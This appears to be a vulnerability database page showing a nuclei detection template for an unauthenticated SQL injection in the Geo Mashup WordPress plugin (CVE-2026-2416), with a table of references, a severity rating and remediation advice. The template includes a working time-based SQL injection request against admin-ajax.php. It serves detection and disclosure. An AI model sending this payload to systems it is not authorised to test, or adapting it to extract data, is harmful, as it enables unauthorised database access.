Lucene search
K

Geo Mashup <= 1.13.17 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Geo Mashup plugin up to 1.13.17 has unauthenticated SQL injection via the sort parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-2416
25 Feb 202608:25
attackerkb
Circl
CVE-2026-2416
25 Feb 202609:39
circl
CNNVD
WordPress plugin Geo Mashup SQL注入漏洞
25 Feb 202600:00
cnnvd
CVE
CVE-2026-2416
25 Feb 202608:25
cve
Cvelist
CVE-2026-2416 Geo Mashup <= 1.13.17 - Unauthenticated SQL Injection via 'sort' Parameter
25 Feb 202608:25
cvelist
EUVD
EUVD-2026-8632
25 Feb 202609:30
euvd
NVD
CVE-2026-2416
25 Feb 202609:16
nvd
Patchstack
WordPress Geo Mashup plugin <= 1.13.17 - Unauthenticated SQL Injection via 'sort' Parameter vulnerability
25 Feb 202607:09
patchstack
Positive Technologies
PT-2026-21889
25 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2026-2416
26 Feb 202610:14
redhatcve
Rows per page
id: CVE-2026-2416

info:
  name: Geo Mashup <= 1.13.17 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Geo Mashup WordPress plugin <= 1.13.17 contains a SQL injection caused by insufficient escaping of the 'sort' parameter, letting unauthenticated attackers extract sensitive database information remotely.
  impact: |
    Unauthenticated attackers can extract sensitive database information, leading to data disclosure and potential further compromise.
  remediation:
    Update to the latest version beyond 1.13.17.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-mashup/geo-mashup-11317-unauthenticated-sql-injection-via-sort-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2416
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2416
    epss-score: 0.01392
    epss-percentile: 0.6902
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,geo-mashup,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/geo-mashup/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 1.13.17')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin-ajax.php?action=geo_mashup_query&output=json&sort=(SELECT(0)FROM(SELECT(SLEEP(8)))a) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains(body, "objects")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100d81b3e9ffd5ee40468c2b357aacfc234ab4ea2d2684faf06d72385a0a9fb7637022100c0791cf1002ca967d0ac7bcc3e890ff6b205b9bf0acdbd90690ed998cbb540ba:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Mar 2026 18:53Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
EPSS0.01392
SSVC
9